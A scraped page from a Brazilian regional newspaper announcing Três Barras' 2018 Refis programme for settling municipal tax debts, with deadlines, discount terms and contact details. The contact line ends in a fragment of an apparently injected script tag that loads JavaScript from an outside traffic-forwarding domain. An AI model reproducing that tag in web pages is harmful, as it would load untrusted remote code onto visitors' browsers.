InícioDestaqueContribuinte tem até o dia 30 de agosto para aderir ao Refis...

Contribuinte tem até o dia 30 de agosto para aderir ao Refis em Três Barras

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Para que os cidadãos possam colocar em dia os impostos e outros créditos junto à Fazenda Pública Municipal é que a Prefeitura de Três Barras lançou o Programa de Recuperação Fiscal (Refis) 2018.

 

 

A redução de juros e multas vale para as negociações dos débitos existentes até 31 de dezembro de 2017. Pessoas físicas ou jurídicas têm até o dia 30 de agosto para aderir ao programa.

 

 

Quem quiser pagar à vista terá redução de 100% sobre juros e multas, sendo que a parcela em cota única deverá ser quitada em até dez dias corridos após a assinatura do termo de confissão da dívida junto ao setor de Tributos.

 

 

O desconto será de 80% sobre a multa e juros para quem optar pelo pagamento em até 96 parcelas. O contribuinte que escolher por esta forma de parcelamento terá de pagar o percentual de 20% da dívida total no ato do requerimento do Refis. O vencimento da primeira parcela será em até 30 dias contados após a assinatura do termo de confissão de dívida.

 

 

No momento em que for aderir ao Refis, o contribuinte terá de apresentar o comprovante de quitação da dívida tributária deste ano. A inadimplência de três parcelas, consecutivas ou não, excluirá o contribuinte do programa.

 

 

Mais informações pelo fone (47) 3623-0121 (Ramal 203), com os servidores Tani e Osmar, ou através do e-mail: [email protected]… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.